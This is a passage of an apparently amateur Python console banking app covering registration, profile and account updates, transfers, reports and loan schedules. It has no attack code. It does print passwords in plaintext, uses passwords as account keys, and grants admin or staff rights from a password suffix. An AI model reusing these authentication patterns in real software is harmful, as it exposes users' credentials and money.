updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, date_time))
print(f'\n Congrats {first_name} {last_name}!'
f'\n You are registered as {type} Customer'
f'\n on {dt_string}'
f'\n IMPORTANT:'
f'\n Please, wait SMS confirming your bank account,'
f'\n then login and change your password first. Thank you!')
with open('users_inventory', 'wb') as users_inventory_file:
pickle.dump(users_inventory, users_inventory_file)
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
def all_users_list():
""" Displays all users in the system """
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y at %H:%M:%S")
def print_user_list():
mark = None
if type(user) is Person:
mark = 'Personal:'
if type(user) is Company:
mark = 'Business:'
if type(user) is Admin or type(user) is Employee:
mark = user.title + ':'
print('{:.<28}'.format(mark + ' ' + user.first_name + ' ' + user.last_name),
'{:.<17}'.format(user.phone), '{:.<21}'.format(user.email), '{:>10}'.format(user.password))
command = input('\n 1. New Applicants.'
'\n 2. Current Users.'
'\n 3. Staff.'
'\n 4. <= Back'
'\n Enter one of the options above:\t')
if command == '1':
print('\n\n|', '=' * 25, ' NEW APPLICANTS REPORT ', '=' * 25, '|',
'\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
flag = True
for account in accounts_inventory:
if user.password == account.owner:
flag = True
break
else:
flag = False
if not flag:
print_user_list()
if command == '2':
print('\n\n|', '=' * 27, ' USERS LIST REPORT ', '=' * 27,
'|\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
for account in accounts_inventory:
if user.password != account.owner:
continue
else:
print_user_list()
break
if command == '3':
print('\n\n|', '=' * 26, ' STAFF LIST REPORT ', '=' * 28,
'|\n| title/first/last name ----- phone number ----'
' email address ------ password |\n|', ' ' * 75, '|')
for user in users_inventory:
if type(user) is Admin or type(user) is Employee:
print_user_list()
print('|', ' ' * 75, '|\n|', '-' * 36,
f'Report done on: {dt_string} |')
def user_update():
""" Updates User's Profile """
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
def print_users_details():
print('1. First name: ', '{:.>22}'.format(user.first_name),
'\n2. Last name: ', '{:.>23}'.format(user.last_name),
'\n3. Phone number: ', '{:.>20}'.format(user.phone),
'\n4. Email address: ', '{:.>19}'.format(user.email),
'\n5. Password: ', '{:.>24}'.format(user.password))
if type(user) is Person:
print('6. Mail address: ', '{:.>20}'.format(user.address))
if type(user) is Company:
print('6. Company name: ', '{:.>20}'.format(user.company_name))
if type(user) is Admin or type(user) is Employee:
print('6. Job title: ', '{:.>18}'.format(user.title))
password = input('\n Enter password:\t')
flag = None
for user in users_inventory:
if user.password != password:
pass
if user.password == password:
flag = True
user_name = user.first_name + ' ' + user.last_name
old_detail = None
new_detail = None
print()
print('=' * 38)
print('---------- Current Profile ----------')
print_users_details()
command = input(f'\nPlease, enter from 1 to 6, which detail'
f'\nyou would like to update:\t')
if command == '1':
old_detail = user.first_name
new_detail = input('\nEnter first name:\t')
user.first_name = new_detail
if command == '2':
old_detail = user.last_name
new_detail = input('\nEnter last name:\t')
user.last_name = new_detail
if command == '3':
old_detail = user.phone
new_detail = input('\nEnter new phone number:\t')
user.phone = new_detail
if command == '4':
old_detail = user.email
new_detail = input('\nEnter new email address:\t')
user.email = new_detail
if command == '5':
old_detail = user.password
old_password = password
new_password = input('\nEnter new password:\t')
re_password = input('\nRepeat new password:\t')
while new_password != re_password:
print('\nRepeat incorrect! Please enter and re-enter new password:\t')
command1 = input()
command2 = input()
if command1 == command2:
new_password = re_password = command2
new_detail = new_password
user.password = new_detail
for account in accounts_inventory:
if account.owner == old_password:
account.owner = user.password
if command == '6':
if type(user) is Person:
old_detail = user.address
new_detail = input('\nEnter new mail address:\t')
user.address = new_detail
if type(user) is Company:
old_detail = user.company_name
new_detail = input('\nEnter new company name:\t')
user.company_name = new_detail
if type(user) is Admin or type(user) is Employee:
old_detail = user.company_name
new_detail = input('\nEnter new title:\t')
user.company_name = new_detail
updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, dt_string))
print('\nYour detail was successfully updated!\n\n',
'=' * 37, '\n------------ New Profile ------------')
print_users_details()
print('-' * 38, f'\n Time of Record:{dt_string}\n', '=' * 38)
with open('users_inventory', 'wb') as users_inventory_file:
pickle.dump(users_inventory, users_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
if not flag:
print('\n Invalid Password!')
def new_account():
""" Opens new bank account """
# accounts_inventory = []
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_new_account():
print('\n NEW ACCOUNT REGISTERED:'
'\n -----------------------',
f'\n Account Owner: {user.first_name} {user.last_name}'
f'\n Account N: {account.account_id}'
f'\n Account Balance: ', '{:{width}.{prec}f}'.format(account.balance, width=10, prec=2), 'lv.'
f'\n Account Interest: {account.interest} %.')
if account_id[0] == '2':
print(f' Pay per month: ', '{:{width}.{prec}f}'.format(account.pay_per_month, width=12, prec=2), 'lv.')
print(f' Recorded on:{dt_string}', '\n', '-' * 36)
owner = input("\n\n Enter the account owner's password:\t")
account_id = input(' Enter 6 digit bank account number:\t')
balance = float(input(' Enter account balance:\t'))
interest = float(input(' Enter the account interest:\t'))
if account_id[0] == '1' and len(account_id) == 6:
accounts_inventory.append(DepositAccount(account_id, balance, interest, owner))
for account in accounts_inventory:
if account.account_id == account_id:
for user in users_inventory:
if account.owner == user.password:
print_new_account()
if account_id[0] == '2' and len(account_id) == 6:
pay_per_month = float(input(' Enter the amount pay per month:\t'))
if account_id[1] == '1':
accounts_inventory.append(CreditAccount(account_id, balance, interest, owner, pay_per_month))
if account_id[1] == '2':
accounts_inventory.append(MortgageAccount(account_id, balance, interest, owner, pay_per_month))
for account in accounts_inventory:
if account.account_id == account_id:
for user in users_inventory:
if account.owner == user.password:
print_new_account()
acc_id = account_id
old_detail = 'new_acc'
new_detail = owner
updates_inventory.append(AccountUpdate(acc_id, old_detail, new_detail, dt_string))
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def new_user_account():
""" Opens first bank account for new user """
def print_user_list():
mark = None
if type(user) is Person:
mark = 'Personal:'
if type(user) is Company:
mark = 'Business:'
if type(user) is Admin or type(user) is Employee:
mark = user.title + ':'
print('{:.<28}'.format(mark + ' ' + user.first_name + ' ' + user.last_name),
'{:.<17}'.format(user.phone), '{:.<21}'.format(user.email), '{:>10}'.format(user.password))
print('\n\n|', '=' * 25, ' NEW APPLICANTS REPORT ', '=' * 25, '|',
'\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
flag = True
for account in accounts_inventory:
if user.password == account.owner:
flag = True
break
else:
flag = False
if not flag:
print_user_list()
new_account()
def account_update():
""" Updates account's detail """
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
def print_acc_details():
print('\n', '=' * 45, '\n', 'Account N: ', '{:<34}'.format(account.account_id), '\n', '-' * 45,
'\n 1. Account balance: ', '{:{width}.{prec}f}'.format(account.balance, width=18, prec=2), 'lv.'
'\n 2. Interest per month: ',
'{:{width}.{prec}f}'.format(account.interest, width=18, prec=2), '%.')
if type(account) is not DepositAccount:
print(' 3. Pay per month: ', '{:{width}.{prec}f}'.format(account.pay_per_month, width=23, prec=2), 'lv.')
print(' 4. Account password: ', '{:>23}'.format(account.owner), '\n 5. Quit.\n', '-' * 45)
command = input('\nEnter Account Number:\t')
for account in accounts_inventory:
if account.account_id == command:
acc_id = account.account_id
old_detail = None
new_detail = None
print_acc_details()
command = input('Enter one of the options above:\t')
if command == '5':
break
if command == '1':
old_detail = account.balance
new_detail = float(input('Enter new balance:\t'))
account.balance = new_detail
if command == '2':
old_detail = account.interest
new_detail = float(input('Enter new interest:\t'))
account.interest = new_detail
if command == '3':
old_detail = account.pay_per_month
new_detail = float(input('Enter new pay per month:\t'))
account.pay_per_month = new_detail
if command == '4':
old_detail = account.owner
new_detail = input("Enter new owner's password:\t")
account.owner = new_detail
updates_inventory.append(AccountUpdate(acc_id, old_detail, new_detail, dt_string))
print(f'\n Update successfully completed!')
print_acc_details()
print(f' Update recorded on: {dt_string}\n', '=' * 45, '\n\n')
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def admin_main_screen():
print('\n', '=' * 40, '\n', '*' * 8, 'ADMIN OPERATIONS MODE', '*' * 8,
'\n\n 10. Accounts.'
'\n 11. Users.'
'\n 12. Transfers.'
'\n 13. Updates Report'
'\n 14. Quit.'
'\n Please, enter one of the options above:\t', '\n', '-' * 40)
def staff_main_screen():
print('\n', '=' * 40, '\n', '*' * 6, 'EMPLOYEE OPERATIONS MODE', '*' * 6,
'\n\n 6. Open New User Account.'
'\n 7. View Accounts.'
'\n 8. View Transfers.'
'\n 9. Quit.'
'\n Please, enter one of the options above:\t', '\n', '-' * 40)
def user_main_screen():
print('\n1. Money Transfer.'
'\n2. Reports.'
'\n3. Open New Account.'
'\n4. Manage Profile.'
'\n5. Quit.'
'\nPlease, enter one of the options above:\t', '\n', '-' * 40)
def user_login():
""" Access to user's accounts and main operations. """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
command1 = input('\nPlease, enter your email:\t')
command2 = input('\nPlease, enter your password:\t')
flag = False
for user in users_inventory:
if command1 != user.email and command2 != user.password:
pass
if command1 == user.email and command2 == user.password:
flag = True
if command1.split('@')[1] == 'bestbank.eu':
command = input('Would you like proceed as customer (Y):\t').upper()
if command != 'Y':
if command2[-5::] == 'admin':
admin_main_screen()
elif command2[-5::] == 'staff':
staff_main_screen()
continue
print('\n', '=' * 6, dt_string, '=' * 6,
f'\n Hello {user.first_name} {user.last_name},'
f'\n Welcome in Best Bank online system!'
f'\n\n Your Accounts:')
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == user.password:
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
user_main_screen()
if not flag:
print('\nInvalid username and/or password!\n', '-' * 32)
def all_accounts():
""" Displays accounts reports and charts in different views """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_head():
print('\n', '=' * 47, '\nACCOUNTS REPORT: {:>30}'.format(dt_string),
'\nacc.N: ----- balance <=>type ------ name ------')
def print_accounts_report():
print('{:.6}'.format(account.account_id), '{:.>15}'.format(account.balance),
'{:.<5}'.format(mark), '{:.>19}'.format(user.first_name + ' ' + user.last_name))
command = input('\n 1. Total.'
'\n 2. By Types + Charts.'
'\n 3. By Users.'
'\n 4. Single account'
'\n 5. <= Back'
'\n\nEnter one of the options above:\t')
if command == '1':
print_head()
total_debit = 0
total_credit = 0
for account in accounts_inventory:
for user in users_inventory:
if user.password == account.owner:
if type(account) is DepositAccount:
total_debit += account.balance
mark = '<=Dt'
else:
total_credit += account.balance
mark = '=>Ct'
print_accounts_report()
print('-' * 43, '\nTotal Debit:', '{:.>26}'.format(total_debit), ' lv.'
'\nTotal Credit:','{:.>25}'.format(total_credit), ' lv.\n', '=' * 47, '\n')
if command == '2':
print_head()
print('Deposit Accounts:')
total_personal_deposits = 0
total_business_deposits = 0
total_staff_deposits = 0
total_deposit = 0
for account in accounts_inventory:
if type(account) is DepositAccount:
total_deposit += account.balance
mark = '<=Dt'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_deposits += account.balance
if type(user) is Company:
total_business_deposits += account.balance
if isinstance(user, Staff):
total_staff_deposits += account.balance
print_accounts_report()
print(f'Total: ....... {total_deposit} Debit\n', '-' * 47)
print('Credit Accounts:')
total_personal_credits = 0
total_business_credits = 0
total_staff_credits = 0
total_credit = 0
for account in accounts_inventory:
if type(account) is CreditAccount:
total_credit += account.balance
mark = '=>Ct'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_credits += account.balance
if type(user) is Company:
total_business_credits += account.balance
if isinstance(user, Staff):
total_staff_credits += account.balance
print_accounts_report()
print(f'Total: ....... {total_credit} Credit\n', '-' * 47)
print('Mortgage Accounts:')
total_personal_mrtgs = 0
total_business_mrtgs = 0
total_staff_mrtgs = 0
total_mrtg = 0
for account in accounts_inventory:
if type(account) is MortgageAccount:
total_mrtg += account.balance
mark = '=>Ct'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_mrtgs += account.balance
if type(user) is Company:
total_business_mrtgs += account.balance
if isinstance(user, Staff):
total_staff_mrtgs += account.balance
print_accounts_report()
print(f'Total: ...... {total_mrtg} Credit\n', '=' * 47, '\n\n')
chart_command = input('\n Structure By Types Users '
'\n 1. - Deposit '
'\n 2. - Credit.'
'\n 3. - Mortgage.'
'\n 4. Totals By Types Accounts.'
'\n 5. <= Back'
'\n\n For Account Structure Chart'
'\n please enter one of options above:\t')
while chart_command in ['1', '2', '3', '4']:
if command == '':
break
if chart_command == '1':
a = total_personal_deposits
b = total_business_deposits
c = total_staff_deposits
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Deposit Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '2':
a = total_personal_credits
b = total_business_credits
c = total_staff_credits
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Credit Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '3':
a = total_personal_mrtgs
b = total_business_mrtgs
c = total_staff_mrtgs
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Mortgage Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '4':
x = ['Deposits', 'Credits', 'Mortgages']
y = [total_deposit, total_credit, total_mrtg]
plt.bar(x, y, color='b')
plt.title('Report By Type Accounts')
plt.show()
chart_command = input()
if command == '3':
applicants_list = []
for user in users_inventory:
for account in accounts_inventory:
if user.password != account.owner:
continue
else:
applicants_list.append(user)
break
for user in users_inventory:
if user not in applicants_list:
continue
print(f'\n{user.first_name} {user.last_name}:')
total = 0
for account in accounts_inventory:
if account.owner == user.password:
print('{:.<6}'.format(account.account_id), '{:.>15}'.format(account.balance))
if account.account_id[0] == '1':
total += account.balance
else:
total -= account.balance
print('Total:', '{:.>15}'.format(total))
if command == '4':
account_id = input('\n Enter account number:\t')
mark = None
for account in accounts_inventory:
if account.account_id == account_id:
if type(account) is DepositAccount:
mark = 'Deposit'
if type(account) is CreditAccount:
mark = 'Credit'
if type(account) is MortgageAccount:
mark = 'Mortgage'
print(f'\n Account N: {account_id}'
f'\n Type: {mark}'
f'\n Balance: {account.balance:.2f} lv'
f'\n Interest: {account.interest:.2f} %')
if type(account) is not DepositAccount:
print(f' Pay per month: {account.pay_per_month:.2f} lv.')
def transfer():
""" Deposit to all accounts and withdraw from deposit accounts """
# transactions_inventory = []
def print_acc_balance():
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
password = input('\n Enter password:\t')
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
type_transfer = input('\n 1. Internal.'
'\n 2. Deposit.'
'\n 3. Withdraw.'
'\n Enter type of transfer:\t')
account_id = input('\n Enter the account number:\t')
amount = float(input("\n Enter the amount you would like to transfer:\t "))
date_time = dt_string
if type_transfer == '1':
account2 = input('\n Enter the second account:\t')
new_balance1 = 0
new_balance2 = 0
account1 = 0
for account in accounts_inventory:
if account.account_id == account_id and type(account) is DepositAccount:
account.balance -= amount
new_balance1 = account.balance
transactions_inventory.append(Withdraw(account_id, amount, date_time))
if account.account_id == account2:
password = account.owner
account1 = account_id
account_id = account2
if type(account) is DepositAccount:
account.balance += amount
else:
account.balance -= amount
new_balance2 = account.balance
transactions_inventory.append(Deposit(account_id, amount, date_time))
print('\n', '=' * 35, f'\n Internal transfer {amount:.2f} lv'
f'\n from acc.N:{account1} to acc.N:{account2}'
f'\n Recorded on:{dt_string}\n', '-' * 35,
'\n New Balance:')
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.account_id == account1:
print_acc_balance()
if account.account_id == account2:
print_acc_balance()
else:
mark = None
for account in accounts_inventory:
if account.account_id == account_id:
password = account.owner
if type_transfer == '2':
mark = 'Deposit'
if type(account) is DepositAccount:
account.balance += amount
else:
account.balance -= amount
transactions_inventory.append(Deposit(account_id, amount, date_time))
if type_transfer == '3':
mark = 'Withdraw'
if type(account) is DepositAccount:
account.balance -= amount
transactions_inventory.append(Withdraw(account_id, amount, date_time))
print('\n', '=' * 40, f'\n {mark} transfer {amount} lv.'
f'\n acc.N:{account_id} New Balance: {account.balance:.2f} lv.'
f'\n Recorded on:{dt_string}\n', '-' * 40)
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == password:
print_acc_balance()
with open('transactions_inventory', 'wb') as transactions_inventory_file:
pickle.dump(transactions_inventory, transactions_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def all_transactions():
""" Displays transaction records in all accounts"""
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_report():
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
f'lv. {mark}', '{:.>25}'.format(transaction.date_time))
command = input('\n 1. Total.'
'\n 2. Daily + Chart.'
'\n 3. <= Back.'
'\n Enter one of the options above:\t')
if command == '1':
total_deposit = 0
total_credit = 0
print('\n\n', '=' * 18, 'ALL TRANSFERS REPORT', '=' * 17, '\nacc.N:',
'...... amount <==> type ......... date ... time', '\n', '-' * 57)
for transaction in transactions_inventory:
for account in accounts_inventory:
if transaction.account_id == account.account_id:
if type(transaction) is Deposit:
mark = '<= Dt.'
total_deposit += transaction.amount
print_report()
else:
mark = '=> Ct.'
total_credit += transaction.amount
print_report()
print('-' * 58, f'\n Total Dt: {total_deposit:.2f} lv. '
f' Total Ct: {total_credit:.2f} lv.',
'\n', '-' * 57, '\n Report done on:', dt_string, '\n')
if command == '2':
print('\n','='*8,'TOTAL DAILY TRANSFERS','='*8,
'\n --- date ----- deposits ----- withdraws')
tday = None
total_deposit = 0
total_credit = 0
deposit_tday = 0
credit_tday = 0
X = []
Y = []
Z = []
for transaction in transactions_inventory:
if type(transaction) is Deposit:
total_deposit += transaction.amount
else:
total_credit += transaction.amount
if tday is None:
tday = transaction.date_time[0:11]
# X.append(tday)
if type(transaction) is Deposit:
deposit_tday = transaction.amount
else:
credit_tday = transaction.amount
elif tday == transaction.date_time[0:11]:
if type(transaction) is Deposit:
deposit_tday += transaction.amount
else:
credit_tday += transaction.amount
continue
else:
print(' {:<12}'.format(tday),
'{:{width}.{prec}f}'.format(deposit_tday, width=10, prec=2),
'{:{width}.{prec}f}'.format(credit_tday, width=15, prec=2))
X.append(tday[0:6])
Y.append(deposit_tday)
Z.append(credit_tday)
tday = transaction.date_time[0:11]
if type(transaction) is Deposit:
deposit_tday = transaction.amount
credit_tday = 0
else:
credit_tday = transaction.amount
deposit_tday = 0
X.append(tday[0:6])
Y.append(deposit_tday)
Z.append(credit_tday)
print(' {:<12}'.format(tday),
'{:{width}.{prec}f}'.format(deposit_tday, width=10, prec=2),
'{:{width}.{prec}f}'.format(credit_tday, width=15, prec=2))
print('-'*40, f'\n Total: {total_deposit:.2f} lv. '
f'{total_credit:.2f} lv.\n', '-'*40)
_X = np.arange(len(X))
plt.title(f'D A I L Y T R A N S F E R S\nreported on:{dt_string}')
plt.bar(_X - 0.2, Y, 0.4)
plt.bar(_X + 0.2, Z, 0.4)
plt.xlabel('Days')
plt.ylabel('amounts')
plt.legend(['Deposit','Withdraw'], loc="upper left")
plt.xticks(_X, X)
chart = input('\nEnter to show in chart')
if chart == '':
plt.show()
def transfer_update():
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_transfer_details():
print('\n Money Transfer:', transfer_time,
'\n 1. Account N: ', transaction.account_id,
f'\n 2. Amount: {transaction.amount:.2f} lv.')
transfer_time = input('\n Enter date_time:\t')
for transaction in transactions_inventory:
if transfer_time == transaction.date_time[1:-1]:
acc_id = transaction.account_id
old_detail = None
new_detail = None
print_transfer_details()
command = input(' 3. Quit.\n Enter one of the options above:\t')
if command == '3':
break
if command == '1':
old_detail = transaction.account_id
new_detail = input('\n Enter new account:\t')
transaction.account_id = new_detail
if command == '2':
old_detail = transaction.amount
new_detail = float(input('\n Enter new amount:\t'))
transaction.amount = new_detail
updates_inventory.append(TransferUpdate(acc_id, old_detail, new_detail, dt_string))
print('\n','='*45,'\n Update successfully completed!')
print_transfer_details()
print(f' Update recorded on: {dt_string}\n', '-' * 45, '\n\n')
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('transactions_inventory', 'wb') as transactions_inventory_file:
pickle.dump(transactions_inventory, transactions_inventory_file)
def my_reports():
""" """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
command = input('\n Enter password:\t')
flag = None
for user in users_inventory:
if user.password != command:
flag = True
pass
if user.password == command:
flag = None
break
if flag:
print('\n Invalid Password!')
exit()
print("\n 1. User's Balance."
"\n 2. All Accounts Transfers."
'\n 3. Single Account Transfers')
command1 = input(' Enter one of the options above:\t')
if command1 == '1':
print('\n Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == command:
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
elif command1 == '2':
my_accounts_list = []
for account in accounts_inventory:
if account.owner == command:
my_accounts_list.append(account.account_id)
for user in users_inventory:
if user.password == command:
print(f"\n{user.first_name} {user.last_name}'s Money Transfers Report:")
break
total_debit = 0
total_credit = 0
print('=' * 60, '\n', 'acc.N:', '...... amount <==> type ......... date ... time ...', '\n', '-' * 60)
for x in my_accounts_list:
for transaction in transactions_inventory:
if x == transaction.account_id:
if type(transaction) is Deposit:
total_debit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. <= Dt', '{:.>25}'.format(transaction.date_time))
else:
total_credit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. => Ct', '{:.>25}'.format(transaction.date_time))
print(' ', '-' * 60, f'\n Total: Dt:{total_debit:.2f}lv. Ct:{total_credit:.2f}lv.\n', '=' * 60)
elif command1 == '3':
account1 = input('\nEnter account number:\t')
print(f'\nAccount:{account1} Transactions Report:')
print('=' * 60, '\n', 'acc.N:', '...... amount <==> type ............. date time', '\n', '-' * 60)
total_debit = 0
total_credit = 0
for transaction in transactions_inventory:
if account1 == transaction.account_id:
if type(transaction) is Deposit:
total_debit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. <= Dt', '{:.>25}'.format(transaction.date_time))
else:
total_credit += transaction.amount
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
'lv. => Ct', '{:.>25}'.format(transaction.date_time))
print(' ', '-' * 60, f'\n Total: Dt:{total_debit:.2f}lv. Ct:{total_credit:.2f}lv.\n', '=' * 60)
else:
print('Invalid Number!')
def interest_calculator():
"""" Calculate interest and balance for period of months"""
def print_scedule():
if command == '1':
print('{:>4}'.format(month),'{:{width}.{prec}f}'.format(interest_amount, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2),
'{:{width}.{prec}f}'.format(balance, width=15, prec=2))
else:
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(balance, width=15, prec=2),
'{:{width}.{prec}f}'.format(interest_amount, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2))
command = input('\n 1. Deposit.'
'\n 2. Credit.'
'\n 3. Mortgage.'
'\n Enter type account from above\t')
type = input('\n 1. Person.'
'\n 2. Business.'
"\n Enter client's type from above:\t")
open_balance = float(input('\n Enter the beginning amount:\t'))
if command == '1':
pay_per_month = float(input(' Enter deposit per month:\t'))
else:
pay_per_month = None
interest = float(input(' Enter percentage interest per month:\t'))
period = int(input(' Enter number of months:\t'))
balance = open_balance
month = None
interest_amount = None
if command == '1':
print('\n', '======= DEPOSIT ACCOUNT SCHEDULE ======='
'\n month interest pay balance \n')
for month in range(1, period + 1):
interest_amount = balance * interest / 100
if balance < 1000:
interest_amount = 0
balance = balance + interest_amount + pay_per_month
print_scedule()
print('\n', '=' * 8, 'DEPOSIT SCHEDULE SUMMARY', '=' * 8,
f'\n If you open {open_balance:.2f} lv.Deposit Account'
f'\n and you add {pay_per_month:.2f} lv. per month,'
f'\n after {period} months you will have {balance:.2f} lv '
f'\n in your account. Thank you!\n', '=' * 42)
if command == '2':
if period > 36:
print("\n Sorry! Invalid Period.")
exit()
if (type == '1' and open_balance > 10000) or (type == '2' and open_balance > 100000):
print("\n Sorry! Invalid Credit Amount.")
exit()
print('\n', '======= CREDIT ACCOUNT SCHEDULE ======='
'\nmonth balance interest pay \n')
for month in range(1, period + 1):
pay_per_month = open_balance / period
interest_amount = balance * interest / 100
if type == '1' and month <= 3:
interest_amount = 0
if type == '2' and month <= 2:
interest_amount = 0
pay_per_month += interest_amount
print_scedule()
balance = balance - pay_per_month + interest_amount
if command == '3':
period_discount = None
discount_interest = None
credit = open_balance
months = period
principal_per_month: float = credit / months
sum_pay1 = 0
if type == '1':
period_discount = 6
discount_interest = 0
if type == '2':
period_discount = 12
discount_interest = interest * 0.5
amount = credit
pay = 0
for month in range(1, period_discount + 1):
interest_per_month = amount * discount_interest / 100
pay = principal_per_month + interest_per_month
sum_pay1 += pay
amount -= principal_per_month
print('\n', '========= MORTGAGE ACCOUNT SCHEDULE ========='
'\nmonth balance principal interest pay\n')
amount = credit
pay = sum_pay1 / period_discount
for month in range(1, period_discount + 1):
interest_per_month = amount * discount_interest / 100
principal_per_month = pay - interest_per_month
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(amount, width=10, prec=2),
'{:{width}.{prec}f}'.format(principal_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(interest_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay, width=10, prec=2))
amount -= principal_per_month
months2 = months - period_discount
r1 = int(amount / months2)
r2 = int(r1 + amount * interest / 100)
amount2 = amount
for pay_per_month in range(r1, r2):
amount2 = amount
count = 0
for _ in range(months2):
ppm = pay_per_month - amount2 * interest / 100
amount2 -= ppm
count += 1
if amount2 <= 0:
break
if amount2 <= 0:
break
for month in range(period_discount + 1, months):
interest_per_month = amount * interest / 100
principal_per_month = pay_per_month - interest_per_month
print('{:>4}'.format(month), '{:{width}.{prec}f}'.format(amount, width=10, prec=2),
'{:{width}.{prec}f}'.format(principal_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(interest_per_month, width=8, prec=2),
'{:{width}.{prec}f}'.format(pay_per_month, width=10, prec=2))
amount -= principal_per_month
interest_per_month = amount * interest / 100
print(f' {months} {amount:.2f} 0.00'
f' {interest_per_month:.2f} '
f'{(amount + interest_per_month):.2f}'
'\n', '-' * 45)
print('\n', '=' * 10, ' MORTGAGE SCHEDULE SUMMARY: ', '=' * 10,
f'\n For total {open_balance:.2f} lv. in period of {months} months,'
f'\n you will pay in first {period_discount} months: {pay:.2f} lv/mo,'
f'\n then in next {months - period_discount - 1} months you will pay: {pay_per_month:.2f} lv/mo'
f'\n and in a last month you will pay {(amount + interest_per_month):.2f} lv.'
'\n Thank you!\n', '-' * 50)
def updates_report():
""" Admin gets all updates records"""
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
print('\n', '{:*^60}'.format(' UPDATES REPORT '))
print(' Accounts Updates:')
for account in updates_inventory:
if type(account) is AccountUpdate:
print('{:15}'.format(account.acc_id), '{:>12}'.format(account.old_detail),
'{:>12}'.format(account.new_detail), '{:25}'.format(account.date_time))
print('-' * 60)
print(' Transfers Updates:')
for update in updates_inventory:
if isinstance(update, TransferUpdate):
if not update.old_detail or not update.new_detail:
continue
print('{:15}'.format(update.acc_id), '{:>12}'.format(update.old_detail),
'{:>12}'.format(update.new_detail), '{:25}'.format(update.date_time))
print('-' * 60)
print('\n Profiles Updates:')
for user in updates_inventory:
if type(user) is UserUpdate:
print('{:15}'.format(user.user_name), '{:>12}'.format(user.old_detail),
'{:>12}'.format(user.new_detail), '{:25}'.format(user.date_time))
print('-' * 60, '\n', 'All updates done to:', dt_string)
def admin_users():
command = input('\n 1. All Users List.'
'\n 2. One User Transfers.'
'\n 3. User Update.'
'\n 4. <= Back.'
'\n Enter one of the options above:\t')
if command == '1':
all_users_list()
if command == '2':
my_reports()
if command == '3':
user_update()
def admin_accounts():
